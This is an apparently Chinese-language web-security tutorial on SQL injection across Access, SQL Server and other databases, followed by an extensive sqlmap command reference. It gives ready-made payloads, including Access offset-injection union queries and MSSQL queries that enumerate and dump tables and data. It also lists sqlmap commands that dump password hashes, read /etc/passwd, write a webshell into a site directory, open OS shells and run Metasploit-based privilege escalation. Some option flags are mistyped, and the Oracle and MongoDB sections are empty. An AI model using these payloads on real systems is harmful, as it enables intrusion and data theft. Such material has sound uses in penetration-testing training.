WEB 漏洞-Oracle,MongoDB 等注入
SQL作用在关系型数据库上面,什么是关系型数据库?关系型数据库是由一张张的二维表组成的, 常见的关系型数据库厂商有MySQL、SQLite、SQL Server、Oracle,由于MySQL是免费的,所以企业一般用MySQL的居多。Web SQL是前端的数据库,它也是本地存储的一种,使用SQLite实现,SQLite是一种轻量级数据库,它占的空间小,支持创建表,插入、修改、删除表格数据,但是不支持修改表结构,如删掉一纵列,修改表头字段名等。但是可以把整张表删了。同一个域可以创建多个DB,每个DB有若干张表。与数据库产生交互就有可能存在注入攻击,不只是MySQL数据库,还有Oracle,MongoDB等数据库也可能会存在注入攻击。
简要了解各数据库
Access,Mysql,mssql(Microsoft SQL server),mongoDB,postgresql,sqlite,oracle,sybase等
- Access->表名->列名->数据,Access数据库保存在网站源码下面,自己网站数据库独立存在,所以无法进行跨库,也没有文件读写的操作。
-mysql->数据库名A->表名->列名->数据 -mysql->数据库名B->表名->列名->数据
Access偏移注入
如果遇到列名猜解不到的情况,则可以使用Access偏移注入
- 借用数据库的自连接查询让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示
- 解决知道Access数据库中知道表名,但是得不到字段的sql注入困境
- 成功与否看技巧与运气,不能保证100%成功无需管理员账号密码字段,直接爆账号密码
- 已知管理表名已知任意字段(一个或多个会增加机率,最常见的就是id)
- 管理表的字段数越少越好(最好是三个:id 账号字段 密码字段)当前注入点的脚本内查询的表内的字段数越多越好
本地Access偏移注入靶场
- 偏移量就是逐步增加或递减,直到出现结果。表示可代替的字符串,用代替22,返回界面依旧报错,然后用*代替21,依次递减。22-16=6,6表示该表中的列名个数。
- 代表6个,后面一串字符代表两倍,就相当于2倍,12个
爆列名数据
一级偏移语句:union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
二级偏移语句:union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
SQL server/MSSQL注入
Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能 (BI)工具提供了企业级的数据管理。Microsoft SQL Server 数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序
- 判断数据库类型
and exists (select * from sysobjects)--返回正常为mssql(也名sql server)
and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈
- 判断数据库版本
and 1=@@version--这个语句要在有回显的模式下才可以哦
and substring((select @@version),22,4)='2008'--适用于无回显模式,后面的2008就是数据库版本, 返回正常就是2008的复制代码第一条语句执行效果图(类似):第二条语句执行效果图:(如果是 2008的话就返回正常)
- 获取所有数据库的个数 (一下3条语句可供选择使用)
and 1=(select quotename(count(name)) from master..sysdatabases)--
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --
and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --
说明:dbid从1-4的数据库一般为系统数据库.
- 获取数据库 (该语句是一次性获取全部数据库的,且语句只适合>=2005,两条语句可供选择使用)
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--
- 获取当前数据库
and db_name()>0
and 1=(select db_name())--
- 获取当前数据库中的表(有2个语句可供选择使用)【下列语句可一次爆数据库所有表(只限于 mssql2005及以上版本)】
and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
- 获得表里的列 一次爆指定表的所有列(只限于mssql2005及以上版本):
and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
- 获取指定数据库中的表的列的数据库 逐条爆指定表的所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--
一次性爆N条所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--复制代码第一条语句:and 1=(select top 1 * from 指定数据库..指定表名 FOR XML PATH(''))--加上where条件筛选结果出来会更加好,如:where and name like '%user%' 就会筛选出含有user关键词的出来。用在筛选表段时很不错。
PostgraSQL注入原理
- https://www.webshell.cc/524.html
- https://www.cnblogs.com/yilishazi/p/14710349.html
- https://www.jianshu.com/p/ba0297da2c2e
Oracle注入
MongoDB注入
- https://blog.csdn.net/weixin_33881753/article/details/87981552
- https://www.secpulse.com/archives/3278.html
注入工具的使用指南
sqlmap基本操作
sqlmap简介
- 基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
- 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
- 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
- 联合查询注入,可以使用union的情况下的注入。
- 堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap支持的数据库
- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB
检测注入
基本格式
#默认使用level1检测全部数据库类型
sqlmap -u "http://www.vuln.cn/post.php?id=1"
#指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
sqlmap -u "http://www.vuln.cn/post.php?id=1" -dbms mysql -level 3
跟随302跳转
- 当注入页面错误的时候,自动跳转到另一个页面的时候需要跟随302,当注入错误的时候,先报错再跳转的时候,不需要跟随302。目的就是:要追踪到错误信息。
cookie注入
#当程序有防get注入的时候,可以使用cookie注入(只有level达到2才会检测cookie)
sqlmap -u "http://www.baidu.com/shownews.asp" -cookie "id=11" -level 2
从post数据包中注入
#可以使用burpsuite或者temperdata等工具来抓取post包 (指定username参数)
sqlmap -r "c:\tools\request.txt" -p "username" -dbms mysql
注入成功后
获取数据库基本信息
#查询有哪些数据库
sqlmap -u "http://www.vuln.cn/post.php?id=1" -dbms mysql -level 3 -dbs
#查询test数据库中有哪些表
sqlmap -u "http://www.vuln.cn/post.php?id=1" -dbms mysql -level 3 -D test -tables
#查询test数据库中admin表有哪些字段
sqlmap -u "http://www.vuln.cn/post.php?id=1" -dbms mysql -level 3 -D test -T admin -columns
#dump出字段username与password中的数据
sqlmap -u "http://www.vuln.cn/post.php?id=1" -dbms mysql -level 3 -D test -T admin -C "username,password" -dump
从数据库中搜索字段
#在dedecms数据库中搜索字段admin或者password。
sqlmap -r “c:\tools\request.txt” -dbms mysql -D dedecms -search -C admin,password
读取与写入文件
首先找需要网站的物理路径,其次需要有可写或可读权限。
- -file-read=RFILE : 从后端的数据库管理系统文件系统读取文件 (物理路径)
- -file-write=WFILE : 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
- -file-dest=DFILE : 后端的数据库管理系统写入文件的绝对路径
sqlmap -r "c:\request.txt" -p id -dbms mysql -file-dest "e:\php\htdocs\dvwa\inc\include\1.php" -file-write "f:\webshell\1112.php"
#使用shell命令:
sqlmap -r "c:\tools\request.txt" -p id -dms mysql -os-shell
#接下来指定网站可写目录:
"E:\php\htdocs\dvwa"
#注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)
sqlmap基本操作
- -u : 注入点
- -f : 指纹判别数据库类型
- -b : 获取数据库版本信息
- -p : 指定可测试的参数(?page=1&id=2 -p "page,id")
- -D "" : 指定数据库名
- -T "" : 指定表名
- -C "" : 指定字段
- -s "" : 保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s "xx.log"** : 恢复:-s "xx.log" --resume)
- --level=(1-5) : 要执行的测试水平等级,默认为1
- --risk=(0-3) : 测试执行的风险等级,默认为1
- --time-sec=(2,5) : 延迟响应,默认为5
- --data : 通过POST发送数据
- --columns : 列出字段
- --current-user : 获取当前用户名称
- --current-db : 获取当前数据库名称
- --users : 列数据库所有用户
- --passwords : 数据库用户所有密码
- --privileges : 查看用户权限(--privileges -U root)
- -U : 指定数据库用户
- --dbs : 列出所有数据库
- --tables -D "" : 列出指定数据库中的表
- --columns -T "user" -D "mysql" : 列出mysql数据库中的user表的所有字段
- --dump-all : 列出所有数据库所有表
- --exclude-sysdbs : 只列出用户自己新建的数据库和表
- --dump -T "" -D "" -C "" : 列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)
- --dump -T "" -D "" --start 2 --top 4 : 列出指定数据库的表的2-4字段的数据
- --dbms : 指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)
- --os : 指定系统(Linux,Windows)
- -v : 详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。 1:显示信息和警告消息。 2:显示调试消息。 3:有效载荷注入。 4:显示HTTP请求。 5:显示HTTP响应头。 6:显示HTTP响应页面的内容
- --privileges : 查看权限
- --is-dba : 是否是数据库管理员
- --roles : 枚举数据库用户角色
- --udf-inject : 导入用户自定义函数(获取系统权限)
- --union-check : 是否支持union 注入
- --union-cols : union 查询表记录
- --union-test : union 语句测试
- --union-use : 采用union 注入
- --union-tech orderby : union配合order by
- --data "" : POST方式提交数据(--data "page=1&id=2")
- --cookie "用;号分开" : cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)
- --referer "" : 使用referer欺骗(--referer "http://www.baidu.com")
- --user-agent "" : 自定义user-agent
- --proxy "http://127.0.0.1:8118" : 代理注入
- --string="" : 指定关键词,字符串匹配.
- --threads : 采用多线程(--threads 3)
- --sql-shell : 执行指定sql命令
- --sql-query : 执行指定的sql语句(--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" )
- --file-read : 读取指定文件
- --file-write : 写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
- --file-dest : 要写入的文件绝对路径
- --os-cmd=id : 执行系统命令
- --os-shell : 系统交互shell
- --os-pwn : 反弹shell(--os-pwn --msf-path=/opt/framework/msf3/)
- --msf-path= : matesploit绝对路径(--msf-path=/opt/framework/msf3/)
- --os-smbrelay :
- --os-bof :
- --reg-read : 读取win系统注册表
- --priv-esc :
- --time-sec= : 延迟设置 默认--time-sec=5 为5秒
- -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" : 指定user-agent注入
- --eta : 盲注
常用语句
sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db --users --passwords --dbs -v 0
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --passwords -U root --union-use -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --dump -T users -C username -D userdb --start 2 --stop 3 -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --dump -C "user,pass" -v 1 --exclude-sysdbs
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --sql-shell -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --file-read "c:\boot.ini" -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd "id" -v 1
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v 1
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v 1
sqlmap -u http://www.xxxxx.com/test.php?p=2 --reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
sqlmap -u http://www.xxxxx.com/test.php?p=2 -b --eta
sqlmap -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
sqlmap -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"
sqlmap -l burp.log --scope="(www)?\.target\.(com|net|org)"
sqlmap -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
sqlmap -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1
sqlmap -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner
sqlmap -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid"
简单的注入流程
#读取数据库版本,当前用户,当前数据库
sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1
#判断当前数据库用户权限
sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用户名 -v 1
sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用户名 -v 1
#读取所有数据库用户或指定数据库用户的密码
sqlmap -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2
#获取所有数据库
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2
#获取指定数据库中的所有表
sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2
#获取指定数据库名中指定表的字段
sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2
#获取指定数据库名中指定表中指定字段的数据
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2
#file-read读取web文件
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2
#file-write写入文件到web
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file使用sqlmap绕过防火墙进行注入测试
sqlmap详细命令
- -is-dba : 当前用户权限(是否为root权限)
- -dbs :所有数据库
- -current-db :网站当前数据库
- -users :所有数据库用户
- -current-user :当前数据库用户
- -random-agent :构造随机user-agent
- -passwords :数据库密码
- -proxy http://local:8080 -threads 10 :(可以自定义线程加速) 代理
- -time-sec=TIMESEC :DBMS响应的延迟时间(默认为5秒)
Options(选项)
- -version : 显示程序的版本号并退出
- -h,-help : 显示此帮助消息并退出
- -v VERBOSE : 详细级别:0-6(默认为1)
- sqlmap -u "http://url/news?id=1" -dbs-o "sqlmap.log" : 保存进度
- sqlmap -u "http://url/news?id=1" -dbs-o "sqlmap.log" -resume : 恢复已保存进度
Target(目标)
以下至少需要设置其中一个选项,设置目标URL。
- -d DIRECT : 直接连接到数据库。
- -u URL,-url=URL : 目标URL。
- -l LIST : 从Burp或WebScarab代理的日志中解析目标。
- -r REQUESTFILE : 从一个文件中载入HTTP请求。
- -g GOOGLEDORK : 处理Google dork的结果作为目标URL。
- -c CONFIGFILE : 从INI配置文件中加载选项。
Request(请求)
这些选项可以用来指定如何连接到目标URL。
- -data=DATA : 通过POST发送的数据字符串
- -cookie=COOKIE : HTTP Cookie头
- -cookie-urlencode : URL 编码生成的cookie注入
- -drop-set-cookie : 忽略响应的Set - Cookie头信息
- -user-agent=AGENT : 指定 HTTP User - Agent头
- -random-agent : 使用随机选定的HTTP User - Agent头
- -referer=REFERER : 指定 HTTP Referer头
- -headers=HEADERS : 换行分开,加入其他的HTTP头
- -auth-type=ATYPE : HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
- -auth-cred=ACRED : HTTP身份验证凭据(用户名:密码)
- -auth-cert=ACERT : HTTP认证证书(key_file,cert_file)
- -proxy=PROXY : 使用HTTP代理连接到目标URL
- -proxy-cred=PCRED : HTTP代理身份验证凭据(用户名:密码)
- -ignore-proxy : 忽略系统默认的HTTP代理
- -delay=DELAY : 在每个HTTP请求之间的延迟时间,单位为秒
- -timeout=TIMEOUT : 等待连接超时的时间(默认为30秒)
- -retries=RETRIES : 连接超时后重新连接的时间(默认3)
- -scope=SCOPE : 从所提供的代理日志中过滤器目标的正则表达式
- -safe-url=SAFURL : 在测试过程中经常访问的url地址
- -safe-freq=SAFREQ : 两次访问之间测试请求,给出安全的URL
Enumeration(枚举)
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己的SQL语句
- -b,-banner : 检索数据库管理系统的标识
- -current-user : 检索数据库管理系统当前用户
- -current-db : 检索数据库管理系统当前数据库
- -is-dba : 检测DBMS当前用户是否DBA
- -users : 枚举数据库管理系统用户
- -passwords : 枚举数据库管理系统用户密码哈希
- -privileges : 枚举数据库管理系统用户的权限
- -roles : 枚举数据库管理系统用户的角色
- -dbs : 枚举数据库管理系统数据库
- -D DBname : 要进行枚举的指定数据库名
- -T TBLname : 要进行枚举的指定数据库表(如:-T tablename -columns)
- -tables : 枚举的DBMS数据库中的表
- -columns : 枚举DBMS数据库表列
- -dump : 转储数据库管理系统的数据库中的表项
- -dump-all : 转储所有的DBMS数据库表中的条目
- -search : 搜索列(S),表(S)和/或数据库名称(S)
- -C COL : 要进行枚举的数据库列
- -U USER : 用来进行枚举的数据库用户
- -exclude-sysdbs : 枚举表时排除系统数据库
- -start=LIMITSTART : 第一个查询输出进入检索
- -stop=LIMITSTOP : 最后查询的输出进入检索
- -first=FIRSTCHAR : 第一个查询输出字的字符检索
- -last=LASTCHAR : 最后查询的输出字字符检索
- -sql-query=QUERY : 要执行的SQL语句
- -sql-shell : 提示交互式SQL的shell
Optimization(优化)
这些选项可用于优化SqlMap的性能
- -o : 开启所有优化开关
- -predict-output : 预测常见的查询输出
- -keep-alive : 使用持久的HTTP(S)连接
- -null-connection : 从没有实际的HTTP响应体中检索页面长度
- -threads=THREADS : 最大的HTTP(S)请求并发量(默认为1)
Injection(注入)
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本
- -p : TESTPARAMETER 可测试的参数(S)
- -dbms=DBMS : 强制后端的DBMS为此值
- -os=OS : 强制后端的DBMS操作系统为这个值
- -prefix=PREFIX : 注入payload字符串前缀
- -suffix=SUFFIX : 注入payload字符串后缀
- -tamper=TAMPER : 使用给定的脚本(S)篡改注入数据
Detection(检测)
这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容
- -level=LEVEL : 执行测试的等级(1-5,默认为1)
- -risk=RISK : 执行测试的风险(0-3,默认为1)
- -string=STRING : 查询时有效时在页面匹配字符串
- -regexp=REGEXP : 查询时有效时在页面匹配正则表达式
- -text-only : 仅基于在文本内容比较网页
Techniques(技巧)
这些选项可用于调整具体的SQL注入测试
- -technique=TECH : SQL注入技术测试(默认BEUST)
- -time-sec=TIMESEC : DBMS响应的延迟时间(默认为5秒)
- -union-cols=UCOLS : 定列范围用于测试UNION查询注入
- -union-char=UCHAR : 用于暴力猜解列数的字符
Fingerprint(指纹)
- -f,-fingerprint : 执行检查广泛的DBMS版本指纹
Brute force(蛮力)
这些选项可以被用来运行蛮力检查
- -common-tables : 检查存在共同表
- -common-columns : 检查存在共同列
User-defined function injection(用户自定义函数注入):
这些选项可以用来创建用户自定义函数。
- -udf-inject : 注入用户自定义函数
- -shared-lib=SHLIB : 共享库的本地路径
File system access(访问文件系统)
这些选项可以被用来访问后端数据库管理系统的底层文件系统
- -file-read=RFILE : 从后端的数据库管理系统文件系统读取文件
- -file-write=WFILE : 编辑后端的数据库管理系统文件系统上的本地文件
- -file-dest=DFILE : 后端的数据库管理系统写入文件的绝对路径
Operating system access(操作系统访问)
这些选项可以用于访问后端数据库管理系统的底层操作系统
- -os-cmd=OSCMD : 执行操作系统命令
- -os-shell : 交互式的操作系统的shell
- -os-pwn : 获取一个OOB shell,meterpreter或VNC
- -os-smbrelay : 一键获取一个OOB shell,meterpreter或VNC
- -os-bof : 存储过程缓冲区溢出利用
- -priv-esc : 数据库进程用户权限提升
- -msf-path=MSFPATH : Metasploit Framework本地的安装路径
- -tmp-path=TMPPATH : 远程临时文件目录的绝对路径
Windows注册表访问
- -reg-read : 读一个Windows注册表项值
- -reg-add : 写一个Windows注册表项值数据
- -reg-del : 删除Windows注册表键值
- -reg-key=REGKEY : Windows注册表键
- -reg-value=REGVAL : Windows注册表项值
- -reg-data=REGDATA : Windows注册表键值数据
- -reg-type=REGTYPE : Windows注册表项值类型
这些选项可以用来设置一些一般的工作参数
- -t TRAFFICFILE : 记录所有HTTP流量到一个文本文件中
- -s SESSIONFILE : 保存和恢复检索会话文件的所有数据
- -flush-session : 刷新当前目标的会话文件
- -fresh-queries : 忽略在会话文件中存储的查询结果
- -eta : 显示每个输出的预计到达时间
- -update : 更新SqlMap
- -save : file保存选项到INI配置文件
- -batch : 从不询问用户输入,使用所有默认配置
Miscellaneous(杂项)
- -beep : 发现SQL注入时提醒
- -check-payload : IDS对注入payloads的检测测试
- -cleanup : SqlMap具体的UDF和表清理DBMS
- -forms : 对目标URL的解析和测试形式
- -gpage=GOOGLEPAGE : 从指定的页码使用谷歌dork结果
- -page-rank : Google dork结果显示网页排名(PR)
- -parse-errors : 从响应页面解析数据库管理系统的错误消息
- -replicate : 复制转储的数据到一个sqlite3数据库
- -tor : 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
- -wizard : 给初级用户的简单向导界面
0 条评论